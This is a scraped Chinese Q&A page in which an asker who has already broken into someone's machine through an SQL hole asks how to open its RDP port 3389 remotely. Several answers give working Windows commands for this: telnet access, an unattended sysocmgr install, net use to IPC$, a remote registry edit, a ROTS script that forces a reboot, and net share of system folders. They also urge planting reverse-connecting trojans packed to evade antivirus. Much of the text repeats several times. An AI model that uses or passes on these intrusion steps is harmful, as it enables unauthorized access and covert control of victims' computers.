远程用cmd开对方3389端口
***刷分的请回避***说白了就是,他有SQL漏洞,我以经在他机上建了帐号和密码,但他没开3389,我要怎么样远程用本机的cmd(或远程在对方机器上用CMD)开对方338...
***刷分的请回避***
说白了就是,他有SQL漏洞,我以经在他机上建了帐号和密码,但他没开3389,我要怎么样远程用本机的cmd(或远程在对方机器上用CMD)开对方3389端口(请说细点*只限CMD方法)
对方还中了RADMIN,可被别人上了密~~~~
要是给他开了3389后,他是不得重起机,那IP不就变了吗,我还得重搜他的IP吗? 展开
说白了就是,他有SQL漏洞,我以经在他机上建了帐号和密码,但他没开3389,我要怎么样远程用本机的cmd(或远程在对方机器上用CMD)开对方3389端口(请说细点*只限CMD方法)
对方还中了RADMIN,可被别人上了密~~~~
要是给他开了3389后,他是不得重起机,那IP不就变了吗,我还得重搜他的IP吗? 展开
14个回答
展开全部
开XP系统3389服务所用的软件是xp3389.exe,,通过TFTP或FTP手段将xp3389.exe上传到对方系统目录下,一般是c:\windows\system32\,然后直接运行xp3389.exe即可,对方系统不重新启动就可以用3389登陆了.
开2000系统3389服务所用的软件是3389.exe,通过TFTP或FTP手段将3389.exe上传到对方任何目录下,直接运行3389.exe,运行成功后对方计算机要重新启动,待对方重新启动并连接上网后就可以通过3389登陆了.(上传方法还很多)
有的网友会问,如果对方是动态IP,重新启动后不就找不到对方计算机了吗?安装2000服务版系统的计算机多数是固定IP,重新启动后依然能找到的,如果实在担心的话,可以先传一个反弹端口类型的木马上去,这样就万无一失了.(广外男生,灰鸽子等)
开2000系统3389服务所用的软件是3389.exe,通过TFTP或FTP手段将3389.exe上传到对方任何目录下,直接运行3389.exe,运行成功后对方计算机要重新启动,待对方重新启动并连接上网后就可以通过3389登陆了.(上传方法还很多)
有的网友会问,如果对方是动态IP,重新启动后不就找不到对方计算机了吗?安装2000服务版系统的计算机多数是固定IP,重新启动后依然能找到的,如果实在担心的话,可以先传一个反弹端口类型的木马上去,这样就万无一失了.(广外男生,灰鸽子等)
参考资料: http://www.hack58.net/Soft/html/15/29/2005/20050301281.htm
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
Storm代理
2023-07-25 广告
StormProxies是全球大数据IP资源服务商,其住宅代理网络由真实的家庭住宅IP组成,可为企业或个人提供满足各种场景的代理产品。点击免费测试(注册即送1G流量)StormProxies有哪些优势?1、IP+端口提取形式,不限带宽,IP...
点击进入详情页
本回答由Storm代理提供
展开全部
如果对方的端口有开放:
telnet 192.168.0.1
输入用户名/密码
C:\>
\\成功进入!!!!
进入后,再次检查终端组件是否安装:
c:\>query user
这个工具需要安装终端服务.
这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\\类似这样的信息,可能组件就已安装.
好!都清楚了,可以开始安装了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //检查INF文件的位置
c:\WINNT\inf 的目录
2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //检查组件安装程序
c:\WINNT\system32 的目录
2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//这是建立无人参与的安装参数
c:\>type c:\wawa
[Components]
TSEnable = on
//检查参数文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.
如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.
这里还有两种方法
第一种开启的办法:
使用DameWare Mini Remote Control远程连接上,
在"终端服务配置"里,重新启用RDP连接,马上就可以使用3389了.
第二种开启的办法:
修改远程注册表.
比如:
主机IP: 192.168.0.1
已有的帐号和密码: wawa/7788
首先与远程主机建立连接
net use \\192.168.0.1\ipc$ "7788" /user:"wawa"
再打开本机注册表
"开始"==>"运行"==>regedit
在"注册表"下拉菜单中选择"连接网络注册表"
在"计算机名"中输入 \\192.168.0.1
这样就进入了远程主机注册表.
现在我们找到这里:
hkey_local_machine\system\currentcontrolset\control\terminal server\winstations\rdp-tcp\fEnableWinStation
将fEnableWinStation值由0改为1
SQLEXEC或telnet进入后,检查终端组件是否安装:
c:\>query user
这个工具需要安装终端服务.
这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\\类似这样的信息,可能组件就已安装.
好!都清楚了,可以开始安装了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //检查INF文件的位置
c:\WINNT\inf 的目录
2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //检查组件安装程序
c:\WINNT\system32 的目录
2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//这是建立无人参与的安装参数
c:\>type c:\wawa
[Components]
TSEnable = on
//检查参数文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.
如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.
前提是对方要已经安装了终端服务的组件才行
如果是ADLS 因为是动态IP... 只有重收了撒!!!
telnet 192.168.0.1
输入用户名/密码
C:\>
\\成功进入!!!!
进入后,再次检查终端组件是否安装:
c:\>query user
这个工具需要安装终端服务.
这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\\类似这样的信息,可能组件就已安装.
好!都清楚了,可以开始安装了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //检查INF文件的位置
c:\WINNT\inf 的目录
2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //检查组件安装程序
c:\WINNT\system32 的目录
2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//这是建立无人参与的安装参数
c:\>type c:\wawa
[Components]
TSEnable = on
//检查参数文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.
如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.
这里还有两种方法
第一种开启的办法:
使用DameWare Mini Remote Control远程连接上,
在"终端服务配置"里,重新启用RDP连接,马上就可以使用3389了.
第二种开启的办法:
修改远程注册表.
比如:
主机IP: 192.168.0.1
已有的帐号和密码: wawa/7788
首先与远程主机建立连接
net use \\192.168.0.1\ipc$ "7788" /user:"wawa"
再打开本机注册表
"开始"==>"运行"==>regedit
在"注册表"下拉菜单中选择"连接网络注册表"
在"计算机名"中输入 \\192.168.0.1
这样就进入了远程主机注册表.
现在我们找到这里:
hkey_local_machine\system\currentcontrolset\control\terminal server\winstations\rdp-tcp\fEnableWinStation
将fEnableWinStation值由0改为1
SQLEXEC或telnet进入后,检查终端组件是否安装:
c:\>query user
这个工具需要安装终端服务.
这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\\类似这样的信息,可能组件就已安装.
好!都清楚了,可以开始安装了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //检查INF文件的位置
c:\WINNT\inf 的目录
2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //检查组件安装程序
c:\WINNT\system32 的目录
2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//这是建立无人参与的安装参数
c:\>type c:\wawa
[Components]
TSEnable = on
//检查参数文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.
如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.
前提是对方要已经安装了终端服务的组件才行
如果是ADLS 因为是动态IP... 只有重收了撒!!!
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
(对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05
使用方法:
在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:
c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]
服务端口: 设置终端服务的服务端口。默认是3389。
自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。
使用/fr表示强制重起目标。(如果/r不行,可以试试这个)
使用此参数时,端口设置不能忽略。
比如扫描到了一个有NT弱口令的服务器,IP地址是222.222.222.222,管理员帐户是administrator,密码为空
运行CMD(2000下的DOS),我们给它开终端!
命令如下!
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
上面的命令应该可以理解吧?cscript reg.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为222.222.222.222 这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启)
脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。
因为pro版不能安装终端服务。
如果你确信脚本判断错误,就继续安装好了。
如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用""表示)。
脚本访问的目标的135端口,如果目标135端口未开放,或者WMI服务关闭,那么脚本就没用了。
使用方法:
在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:
c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]
服务端口: 设置终端服务的服务端口。默认是3389。
自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。
使用/fr表示强制重起目标。(如果/r不行,可以试试这个)
使用此参数时,端口设置不能忽略。
比如扫描到了一个有NT弱口令的服务器,IP地址是222.222.222.222,管理员帐户是administrator,密码为空
运行CMD(2000下的DOS),我们给它开终端!
命令如下!
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
上面的命令应该可以理解吧?cscript reg.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为222.222.222.222 这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启)
脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。
因为pro版不能安装终端服务。
如果你确信脚本判断错误,就继续安装好了。
如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用""表示)。
脚本访问的目标的135端口,如果目标135端口未开放,或者WMI服务关闭,那么脚本就没用了。
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
给你几点思路
既然你是用mssql加了管理员帐号 那就是sa权限 你可以在后台上传3389.exe
2003服务器运行后不用重起就能开3389端口,不过这是下下策 因为对方服务器一般都开了放火墙 3389肯定被拒绝访问 (你可以扫一下他的所有端口或直接在webshell里运行netstat -an看他的端口,我遇到过的主机有一半都是改了3389端口的,把端口号比较大的一个个试)
换是我的话直接丢个鸽子上去,穿墙而且通过鸽子的屏幕监控登陆日志上显示的是127.0.0.1就是本机登陆 效果多好啊
RADMIN有密码就不用想了 管理员不是吃醋的 不会有弱密码 暴力解破没戏
这有个暴力解破的http://soft.77169.com/HTML/17673.html
建议你用鸽子
既然你是用mssql加了管理员帐号 那就是sa权限 你可以在后台上传3389.exe
2003服务器运行后不用重起就能开3389端口,不过这是下下策 因为对方服务器一般都开了放火墙 3389肯定被拒绝访问 (你可以扫一下他的所有端口或直接在webshell里运行netstat -an看他的端口,我遇到过的主机有一半都是改了3389端口的,把端口号比较大的一个个试)
换是我的话直接丢个鸽子上去,穿墙而且通过鸽子的屏幕监控登陆日志上显示的是127.0.0.1就是本机登陆 效果多好啊
RADMIN有密码就不用想了 管理员不是吃醋的 不会有弱密码 暴力解破没戏
这有个暴力解破的http://soft.77169.com/HTML/17673.html
建议你用鸽子
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
先telnet连接,然后开启他的c盘共享。开共享的命令如下:
net share c=c:\winnt\system 返回共享成功(当然你可以自己改),
之后直接利用\\ip\c来访问对方的system目录了~然后最好是上传反弹木马,这样就不用担心关机ip会变了,在变都会自动连接上你的机子的!记得一定要加壳和改特征码(这个不多说了,网上教程多如牛毛),最后删除共享用。hare c /del 命令就可以了。如果想暴力破解的话,效率会很低的!
net share c=c:\winnt\system 返回共享成功(当然你可以自己改),
之后直接利用\\ip\c来访问对方的system目录了~然后最好是上传反弹木马,这样就不用担心关机ip会变了,在变都会自动连接上你的机子的!记得一定要加壳和改特征码(这个不多说了,网上教程多如牛毛),最后删除共享用。hare c /del 命令就可以了。如果想暴力破解的话,效率会很低的!
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
更多回答(12)
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询
